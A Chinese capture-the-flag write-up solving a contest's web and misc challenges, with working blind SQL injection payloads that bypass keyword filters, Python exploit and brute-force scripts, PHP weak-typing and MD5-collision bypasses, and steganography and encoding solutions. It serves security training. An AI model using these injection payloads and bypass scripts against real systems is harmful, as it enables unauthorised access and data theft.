web部分
下载下载
与以前见到bugku的题差不多。
提示:flag.php
然后下载文件:http://120.79.1.69:10002/?file=flag.php
即可得到文件:
<?php
header('Content-Type: text/html; charset=utf-8'); //网页编码
function encrypt($data, $key) {
$key = md5 ( $key );
$x = 0;
$len = strlen ( $data );
$l = strlen ( $key );
for($i = 0; $i < $len; $i ++) {
if ($x == $l) {
$x = 0;
}
$char .= $key {$x};
$x ++;
}
for($i = 0; $i < $len; $i ++) {
$str .= chr ( ord ( $data {$i} ) + (ord ( $char {$i} )) % 256 );
}
return base64_encode ( $str );
}
function decrypt($data, $key) {
$key = md5 ( $key );
$x = 0;
$data = base64_decode ( $data );
$len = strlen ( $data );
$l = strlen ( $key );
for($i = 0; $i < $len; $i ++) {
if ($x == $l) {
$x = 0;
}
$char .= substr ( $key, $x, 1 );
$x ++;
}
for($i = 0; $i < $len; $i ++) {
if (ord ( substr ( $data, $i, 1 ) ) < ord ( substr ( $char, $i, 1 ) )) {
$str .= chr ( (ord ( substr ( $data, $i, 1 ) ) + 256) - ord ( substr ( $char, $i, 1 ) ) );
} else {
$str .= chr ( ord ( substr ( $data, $i, 1 ) ) - ord ( substr ( $char, $i, 1 ) ) );
}
}
return $str;
}
$key="MyCTF";
$flag="o6lziae0xtaqoqCtmWqcaZuZfrd5pbI=";//encrypt($flag,$key)
?>
给出啦加密和解密函数。
只需添加echo decrypt($flag,$key);
在本地进行解密即可得到flag
web签到
观察页面只有什么都没发现
点击flag在这里发现
用bp抓包发现flag:
base64解密即可达到flag
曲折的人生
通过测试发现存在注入
过滤了or select union 等关键字,但通过双写就可以绕过
注出密码:ajahas&&*44askldajaj
然后就是验证码。(让人自闭)比赛时期,有许多乱码字符,最后没搞出来。(生气)赛后脚本跑一下就出来啦。
看脚本:
#coding=utf-8
import requests
import re
url='http://120.79.1.69:10005/?check'
header={
'Host': '120.79.1.69:8887',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://120.79.1.69:8887/web5/index.php',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '39',
'Connection': 'close',
'Cookie': 'PHPSESSID=5g0haq5bfil2eu3lejhffs9bv3',
'Upgrade-Insecure-Requests': '1'
}
# flag =""
#盲注密码
# for x in range(1,50):
# for j in range(27,128):
# # playload = "0' || (ascii(substr(database(),"+str(x)+",1))="+str(j)+") ||'0" #xiaowei
# # playload = "0' || (ascii(substr((selselectect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/ where/**/table_schema/**/like/**/ database()),"+str(x)+",1))="+str(j)+") ||'0" #admin
# # playload = "0' || (ascii(substr((selselectect/**/ group_concat(column_name)/**/ from /**/infoorrmation_schema.columns/**/ where/**/ table_name/**/=/**/'admin'),"+str(x)+",1))="+str(j)+") ||'0" #id,username,password
# playload = "0' || (ascii(substr((seleselectct/*a*/username/*a*/from/*a*/ admin),"+str(x)+",1))="+str(j)+") ||'0" #ajahas&&*44askldajaj
# # print playload
# # exit()
# # playload = string_reverse(playload)
# # print playload
# pwd={
# 'username':playload
# }
# r=requests.post(url,headers=header,data=pwd)
# # print url+playload
# # print r.text
# # exit()
# if j==127:
# break
# if "goodboy_g-60Hellowor" in r.text:
# flag += str(chr(j))
# print flag
# break
# s=requests.session()
# res=s.get(url)
# # print res.text.encode('utf-8')
# ans=re.findall(ur"<div class='rep'>.*X.*X.*/.*X.*</div>",res.text.encode('utf-8'))
# # print ans
# a=re.sub('\xc3\xaf\xc2\xbc\xc2\x89',')',ans[0])
# b=re.sub('ï¼','(',a)
# b=re.sub('(','(',a)
# b=re.sub(')',')',b)
# c=re.sub('X','*',b)
# d=re.sub("<div class='rep'>",'',c)
# e=re.sub('</div>','',d)
# print e
# f=str(int(eval(e)))
# print f
# # f=f[0:len(f)-1]
# # print f
# data={
# 'username':'goodboy_g-60Hellowoorr',
# 'password':'ajahas&&*44askldajaj',
# 'code':f
# }
# proxies = {
# 'http':'http://127.0.0.1:8080'
# }
# an=s.post(url,headers=header,data=data,proxies=proxies)
# print an.text.encode('utf-8')
# # print an.headers
# print data
# # url1='http://120.79.1.69:8887/web5/index.php'
# # bn=s.get(url1)
# # print bn.text
for x in xrange(1,90000000):
s=requests.session()
res=s.get(url)
# print res.text.encode('utf-8')
ans=re.findall(ur"<div class='rep'>.*X.*X.*/.*X.*</div>",res.text.encode('utf-8'))
# print ans
a=re.sub('\xc3\xaf\xc2\xbc\xc2\x89',')',ans[0])
b=re.sub('ï¼','(',a)
b=re.sub('(','(',a)
b=re.sub(')',')',b)
c=re.sub('X','*',b)
d=re.sub("<div class='rep'>",'',c)
e=re.sub('</div>','',d)
print e
f=str(int(eval(e)))
print f
# f=f[0:len(f)-1]
# print f
data={
'username':'goodboy_g-60Hellowoorr',
'password':'ajahas&&*44askldajaj',
'code':f
}
proxies = {
'http':'http://127.0.0.1:8080'
}
an=s.post(url,data=data)
# print an.text.encode('utf-8')
# print an.headers
print data
# url1='http://120.79.1.69:8887/web5/index.php'
# bn=s.get(url1)
# print bn.text
if "验证码正确" in an.text.encode('utf-8'):
print an.text.encode('utf-8')
break
登陆成功后给出:
下载压缩包,
密码%^$%&sss88ioiern.gdsgj查看Form1.txt
Private Function getPassword(ByVal str As String) As String
Dim reString As String
Dim i As Integer
i = 1
While (i <= Len(str))
reString = reString & Mid(str, i, 1)
i = i + (i Mod 5)
Wend
getPassword = reString
End Function
Private Sub Command1_Click()
Dim Dictionary As String
Dictionary = "VmxSS05HSXhXbkpOV0VwT1YwVmFWRll3Wkc5VVJsbDNWMnhhYkZac1NqQlpNRll3VlRBeFNWRnNjRmRpUmtwSVZsY3hSMk14V2xsalJsSnBVakpvV0ZaR1dsWmxSbHBYWWtSYVZtRjZWbGRVVmxwelRrWmFTR1ZHWkZSaGVrWlhWR3hTVjFZeVJuSlhiRUpYWVRGYVYxcFhlRkprTVZaeVkwZHNVMDFWY0ZkV2JURXdWREZSZUZkcmFGVmlhelZvVlcxNFMxWXhjRlpXVkVaUFlrYzVObGt3VmpCWFJrcHpWbXBTVjFadFVqTldiWE4zWkRKT1IySkdaRmRTVm5CUVZtMTBhMVJyTVVkVmJrcFZZa2RTVDFac1VsZFdNVlY0Vld0a1ZVMXNXbGhXTVdodlZsZEtSMU5yWkZWV1JVVXhWV3hhWVZkSFZraGtSbVJUWWtoQ1JsWnJaRFJWTWtaMFUydG9WbUpHV2xoV01HUnZWVVp3V0UxWGNHeFdhelY2V1ZWYVlWUnNXbkpYYm1oWFlrWktVRlY2Um10U01WcFpZVVpXVjJKRmNIaFdSM1JXVFZVd2QyTkdWbFZoTVZwTVZtdFZNVkpuSlRORUpUTkU="
Dim password As String
password = getPassword(Dictionary)
Dim psw As String
psw = Text1.Text
If (psw = password) Then
MsgBox "The password is correct!", vbOKOnly, "密码正确"
Text1.Text = "Password for next pass : " & getPassword(password)
Else
MsgBox "PasswordFail!", vbOKOnly, "密码错误"
End If
End Sub
给出解密flag.zip方法。
编写脚本:
#coding=utf-8
def getpassword(s):
i=1
password=''
while i<=len(s):
password+=s[i-1:i]
i=i+i%5
return password
s='VmxSS05HSXhXbkpOV0VwT1YwVmFWRll3Wkc5VVJsbDNWMnhhYkZac1NqQlpNRll3VlRBeFNWRnNjRmRpUmtwSVZsY3hSMk14V2xsalJsSnBVakpvV0ZaR1dsWmxSbHBYWWtSYVZtRjZWbGRVVmxwelRrWmFTR1ZHWkZSaGVrWlhWR3hTVjFZeVJuSlhiRUpYWVRGYVYxcFhlRkprTVZaeVkwZHNVMDFWY0ZkV2JURXdWREZSZUZkcmFGVmlhelZvVlcxNFMxWXhjRlpXVkVaUFlrYzVObGt3VmpCWFJrcHpWbXBTVjFadFVqTldiWE4zWkRKT1IySkdaRmRTVm5CUVZtMTBhMVJyTVVkVmJrcFZZa2RTVDFac1VsZFdNVlY0Vld0a1ZVMXNXbGhXTVdodlZsZEtSMU5yWkZWV1JVVXhWV3hhWVZkSFZraGtSbVJUWWtoQ1JsWnJaRFJWTWtaMFUydG9WbUpHV2xoV01HUnZWVVp3V0UxWGNHeFdhelY2V1ZWYVlWUnNXbkpYYm1oWFlrWktVRlY2Um10U01WcFpZVVpXVjJKRmNIaFdSM1JXVFZVd2QyTkdWbFZoTVZwTVZtdFZNVkpuSlRORUpUTkU='
print getpassword(getpassword(s))
得到解压flag.zip的密码:
VmH0wW3DZalBnmmSalV1SYSGRr1r3jVYcFrHWkUUlhljkFzCbXaEKyaVJymT1FlVTVskVWhGtonaGU2WWGhVXYol1WVI1F2odFuk
但是:(mmp)360解压发现密码一直不对。
最后发现用winzar解压就好啦:
得到flag.png
发现
后缀改为txt,即可得到flag。
flag:flag{Good luck!}
该网站已被黑
发现是bugku上的原题.
用御剑扫目录可得到:
http://120.79.1.69:10004/shell.php
访问看到
猜测是弱口令:用bp抓包进行爆破得到密码hack
即可得到flag
flag:jactf{DWDASFASCASFAFASFNKAS}
猜密码
查看源代码可知:密码是两个当下时间戳拼接的。我们可以尝试把为了的时间戳都做成字典,让后用burpsuite去爆破。但是这个字典制作比较繁琐。
我们可以将cookie中的PHPSESSID随便改掉(我直接全部删除)。使得服务器无法找到对应的session。这样$_session[‘pwd’]为空,然后我们再使得提交的参数pwd也为空。这样就可以使得它们相等。
最后得到flag。
audit
代码审计
<?php
highlight_file(__FILE__);
include('flag.php');
$str1 = @$_GET['str1'];
$str2 = @$_GET['str2'];
$str3 = @$_GET['str3'];
$str4 = @$_GET['str4'];
$str5 = (string)@$_POST['str5'];
$str6 = (string)@$_POST['str6'];
$str7 = (string)@$_POST['str7'];
if( $str1 == $str2 ){
die('str1 OR Sstr2 no no no');
}
if( md5($str1) != md5($str2) ){
die('step 1 fail');
}
if( $str3 == $str4 ){
die('str3 OR str4 no no no');
}
if ( md5($str3) !== md5($str4)){
die('step 2 fail');
}
if( $str5 == $str6 || $str5 == $str7 || $str6 == $str7 ){
die('str5 OR str6 OR str7 no no no');
}
if (md5($str5) !== md5($str6) || md5($str6) !== md5($str7) || md5($str5) !== md5($str7)){
die('step 3 fail');
}
if(!($_POST['a']) and !($_POST['b']))
{
echo "come on!";
die();
}
$a = $_POST['a'];
$b = $_POST['b'];
$m = $_GET['m'];
$n = $_GET['n'];
if (!(ctype_upper($a)) || !(is_numeric($b)) || (strlen($b) > 6))
{
echo "a OR b fail!";
die();
}
if ((strlen($m) > 4) || (strlen($n) > 4))
{
echo "m OR n fail";
die();
}
$str8 = hash('md5', $a, false);
$str9 = strtr(hash('md5', $b, false), $m, $n);
echo "<p>str8 : $str8</p>";
echo "<p>str9 : $str9</p>";
if (($str8 == $str9) && !($a === $b) && (strlen($b) === 6))
{
echo "You're great,give you flag:";
echo $flag;
}
前两步还是非常好绕过的。
第一步就是利用弱类型绕过或数组绕过。
第二步就是数组绕过。
第三步利用了string进行强制类型转换,我们无法用数组绕过。
只能用MD5强碰撞,要求传入三个值不能相等,但是MD5相等。
这里官方推荐啦一个MD5碰撞的工具:
链接
这个工具可以生成若干MD5相等的文件。这样可以绕过第三步。
(python3环境)
利用这个工具先安装libboost-all-dev然后运行python3 gen_coll_test.py 就会看见生成了大量文件。
再看最后一步。
需要传入a、b、m、n参数,$a为大写字母,$b为数字、并且长度为6,$m和$n长度小于4。
$str8为$a hash加密后的值,$str9为$b hash加密后,把$m替换为$n,要求$str8== $str9。还是用的弱类型。
传入的$a要hash加密后为0e开头,如果$b为hash加密后0e开头,可以满足,长度为6不能满足,但是还有次替换,只需要把0e后不是数字的替换为数字就可以。
找到值:
然后提交即可得到flag:
完整脚本:
import hashlib
import requests
def md5(str):
p= hashlib.md5(str).hexdigest()
return p
for i in range(1,999999):
if md5(str(i))[0:2] == '0e':
if 'e' not in md5(str(i))[2:]:
if 'f' not in md5(str(i))[2:]:
if 'a' not in md5(str(i))[2:]:
print i
url='http://120.79.1.69:10007/?str1[]=1&str2[]=2&str3[]=3&str4[]=4&m=bcd&n=123'
str5=open('md5/out_test_003.txt','rb').read()
str6=open('md5/out_test_001.txt','rb').read()
str7=open('md5/out_test_002.txt','rb').read()
print str5
data= {
'str5':str5,
'str6':str6,
'str7':str7,
'a':'QNKCDZO',
'b':'259987'
}
res= requests.post(url=url,data=data)
print res.content
not_easy
这是一道create_function()代码注入的题目。
详见另一篇文章:create_function代码注入
misc部分
签到
就是关注公众号。
真的不是图片
通过winhex发现像是隐藏啦压缩包
。binwalk一下发现:
(当场爆毕)
正确方法(官方的):
我们binwalk一下,发现了有zip:
但是foremost分离一下,没有zip。
因为binwalk 无法正常提取.
猜测是文件头问题
zip HEX 50 4B 03 04 14 00 00
所以搜索14000000
发现:
可以看到504b0304被替换成了6a613636也就是ja66。
得到subject.zip 有密码。猜测是ja66。果然是。
解压后发现是32个文件夹里面都有一个txt文件,且有一个字符。
提取出来:
amFjdGZ7NjRzZTY0XzFzXzUwX2MwMDF9
进行base64解码。得到flag。
脚本:
import base64
flag=''
for x in xrange(0,32):
path='subject/'+str(x)+'/'+str(x)+'.txt'
f=open(path,'r')
flag+=f.read()
print len(flag)
print flag
print base64.b64decode(flag)
怀疑人生
发现是三个文件
ctf1.zip有密码,进行爆破发现口令为password。
打开后进行base64解码再进行uincode解码得到。
flag{hacker
然后看ctf2.jpg 用十六进制打开发现隐藏zip,用foremost一下得到压缩包。发现有密码,爆破不出来。用winhex观察压缩包发现是全局伪加密。
把01 00 改为00 00 。打开压缩包发现是ook加密
解密后得到
在进行base58解密:
得到:misc
再看ctf3.jpg
进行扫码得到:12580}
最后拼在一起就是flag
该死的温柔
我们可以发现该死和guess谐音,那么我们有个隐写工具OutGuess,它是一种通用的隐写工具,可以插入将隐藏信息存入数据源的冗余位。
工具下载和安装
Kail终端命令输入:
git clone https://github.com/crorvick/outguess
安装包随即下载到文件夹。双击打开文件夹,右键点击空白区域终端打开。
随后输入以下命令
./configure&& make && make install
右键查看图片属性,发现备注guess
这是使用这个工具的密码。
kail上输入命令:
outguess -k "guess" -r flag.jpg ctf.txt
其中guess是密码,-r是解密指令,ctf.txt是输出ctf.txt文件
打开ctf.txt 即可得到flag。
你对我网站做了什么
这是一个流量分析题。用wireshark分析。追踪流查看HTTP流量包。
发现加密的方法。是对exec执行的结果用gzcompress()进行压缩,然后通过base64加密后进行传输。追踪流发现
在最后那个POST请求中发现了执行了cat /flag.txt
和命令执行后返回值的加密字符串,直接进行解密。
<?php
echo gzuncompress(base64_decode('eJxLy0lMrw6NTzPMS4n3TVWsBQAz4wXi'));
?>
得到flag。
这是什么玩意儿
=E4=BD=9B=E6=9B=B0=EF=BC=9A=E6=A2=B5=E5=83=A7=E5=A5=A2=E6=A5=9E=E5=A5=A2=E5=90=89=E8=8B=A5=E5=A5=A2=E4=B8=8D=E5=B8=9D=E5=86=A5=E5=A4=9C=E6=98=AF=E7=BC=BD=E6=9C=8B=E7=BC=BD=E7=9C=9F=E7=89=B9=E4=BF=B1=E4=B8=8A=E7=BD=B0=E8=83=BD=E7=9A=A4=E5=AE=A4=E9=98=BF=E8=AB=B3=E6=98=8E=E4=B8=80=E5=88=87=E5=91=90=E9=99=A4=E6=A2=B5=E5=A7=AA=E7=BC=BD=E5=A9=86=E5=91=90=E4=BA=A6=E5=8F=83=E4=BE=84=E5=91=BC=E7=9A=A4=E4=B8=96=E5=93=86=E7=89=B9=E5=93=86=E6=95=85=E5=8B=9D=E8=AB=B3=E7=88=8D=E8=AC=B9=E6=99=BA=E7=9A=A4=E5=8F=83=E5=AD=95=E9=80=9D=E8=AB=B3=E8=AC=B9=E6=BC=AB=E6=AD=BB=E5=8D=B3=E4=BE=84=E9=99=A4=E5=93=86=E9=80=9D=E4=BE=84=E6=98=AF=E5=A5=A2=E5=96=9D=E7=A4=99=E8=B1=86=E8=AB=B3=E6=A5=9E=E7=84=A1=E4=BF=B1=E8=80=85=E5=93=86=E5=BA=A6=E8=80=85=E3=80=82=E8=AB=B3=E7=9C=9F=E5=86=A5=E8=A8=B6=E4=BE=84=E5=8B=9D=E7=AB=9F=E8=97=9D=E5=A5=A2=E4=B8=8D=E4=BC=8A=E7=9A=A4=E8=AC=B9=E6=B6=85=E5=AD=95=E7=84=A1=E4=BB=96=E7=BE=85=E5=A4=A7=E5=BE=97=E9=97=8D=E5=93=86=E5=96=9D=E8=80=B6=E5=83=A7=E7=84=A1=E7=BE=AF=E6=BB=85=E9=99=A4=E5=88=A9=E7=BC=BD=E5=A4=9A=E6=A2=B5=E5=A4=B7=E6=A2=B5=E6=A0=97=E7=BC=BD=E8=80=85=E5=AD=95=E8=AB=B3=E7=9B=A7=E7=9A=A4=E4=B8=89=E7=BD=B0=E5=AF=AB=E8=80=81=E6=A2=B5=E8=80=B6=E5=AE=A4=E5=B8=9D=E6=A2=B5=E5=AF=AB=E7=BE=AF=E6=95=B8=E6=A2=B5=E7=9B=A1=E4=BE=84=E6=A0=97=E4=BE=84=E8=97=90=E4=BF=B1=E4=B8=96=E8=AB=B3=E4=B8=8A=E8=AB=B3=E5=A7=AA=E6=95=B8=E5=AE=A4=E5=A9=86=E7=BD=B0=E6=A7=83=E5=A5=A2=E8=A8=B6=E5=93=86=E5=A4=9A=E9=80=9D=E8=97=90=E9=81=93=E6=A2=B5=E6=A5=9E=E6=A2=B5=E5=8D=97=E4=BE=84=E8=BF=A6=E5=91=90=E7=9F=A5=E6=9C=8B=E6=A5=9E=E4=BE=84=E9=9B=A2=E5=91=90=E6=B2=99=E5=91=90=E6=99=BA=E9=81=AE=E5=A4=A7=E5=AE=A4=E7=A5=9E=E5=86=A5=E8=BC=B8=E6=AE=BF=E7=BC=BD=E6=A7=83=E6=A2=B5=E6=80=9B=E6=81=90=E8=88=8D=E7=9F=A5=E7=9A=A4=E8=BF=A6=E5=A5=A2=E8=88=AC=E8=AB=B3=E7=88=8D=E5=AF=AB=E6=BC=AB=E4=BC=8A=E4=BF=B1=E6=A0=97=E5=93=86=E4=BB=96=E4=BA=A6=E7=BC=BD=E6=A5=9E=E6=80=9B=E5=86=A5=E5=91=BC=E5=88=87=E4=BF=B1=E8=8F=A9=E8=88=8D=E5=91=90=E5=AF=A6=E6=A0=97=E5=A5=A2=E6=B3=A2=E6=91=A9=E8=AB=B3=E9=81=93=E7=BC=BD=E7=91=9F=E5=93=86=E5=AF=A6=E7=9A=A4=E7=88=8D=E5=8B=9D=E8=96=A9=E7=BD=B0=E8=AB=B8=E5=A5=A2=E8=88=AC=E8=AB=A6=E7=BD=B0=E6=98=8E=E7=BC=BD=E8=AB=A6=E5=B0=BC=E5=93=86=E6=A5=9E=E4=BD=9B=E4=BF=B1=E9=86=AF=E8=AB=B3=E6=BB=85=E5=BA=A6=E5=93=86=E6=89=80=E6=A7=83=E5=A7=AA=E9=BA=BC=E6=89=80=E6=81=90=E8=AB=B3=E4=BB=96=E4=BE=84=E5=AF=AB=E7=91=9F=E4=BE=84=E6=89=80=E5=BE=97=E9=9A=B8=E5=93=86=E9=97=8D=E5=91=90=E6=8F=90=E7=9B=A7=E5=86=A5=E5=92=92=E5=A5=A2=E6=9B=B0=E5=91=90=E6=B2=99=E6=80=AF=E8=88=AC=E5=8D=97=E6=80=AF=E5=9C=B0=E7=BC=BD=E5=96=9D=E5=86=A5=E6=83=B3=E5=91=90=E7=9B=A7=E7=BD=B0=E8=AC=B9=E5=91=BC=E8=B7=8B=E7=BC=BD=E4=B8=8A=E5=A8=91=E8=AB=A6=E6=AD=BB=E4=BE=84=E8=BF=A6
经过搜索发现Quoted-printable编码。解码得到:
佛曰:梵僧奢楞奢吉若奢不帝冥夜是缽朋缽真特俱上罰能皤室阿諳明一切呐除梵姪缽婆呐亦參侄呼皤世哆特哆故勝諳爍謹智皤參孕逝諳謹漫死即侄除哆逝侄是奢喝礙豆諳楞無俱者哆度者。諳真冥訶侄勝竟藝奢不伊皤謹涅孕無他羅大得闍哆喝耶僧無羯滅除利缽多梵夷梵栗缽者孕諳盧皤三罰寫老梵耶室帝梵寫羯數梵盡侄栗侄藐俱世諳上諳姪數室婆罰槃奢訶哆多逝藐道梵楞梵南侄迦呐知朋楞侄離呐沙呐智遮大室神冥輸殿缽槃梵怛恐舍知皤迦奢般諳爍寫漫伊俱栗哆他亦缽楞怛冥呼切俱菩舍呐實栗奢波摩諳道缽瑟哆實皤爍勝薩罰諸奢般諦罰明缽諦尼哆楞佛俱醯諳滅度哆所槃姪麼所恐諳他侄寫瑟侄所得隸哆闍呐提盧冥咒奢曰呐沙怯般南怯地缽喝冥想呐盧罰謹呼跋缽上娑諦死侄迦
然后进行佛经解码:
公正友善自由公正民主公正和谐法治自由公正公正法治友善平等公正爱国公正平等法治爱国公正敬业公正友善爱国平等诚信平等法治敬业法治平等公正公正公正诚信平等平等友善敬业法治民主法治富强法治友善法治
再进行 核心价值观解码:
得到flag:jactf{hexin_yufo_qp}
so_easy
下载下来发现是exe文件,(差点就放弃啦。。。)然后发现是运行不了。用winhex打开发现不像是exe文件。像是txt文件。然后改后缀。
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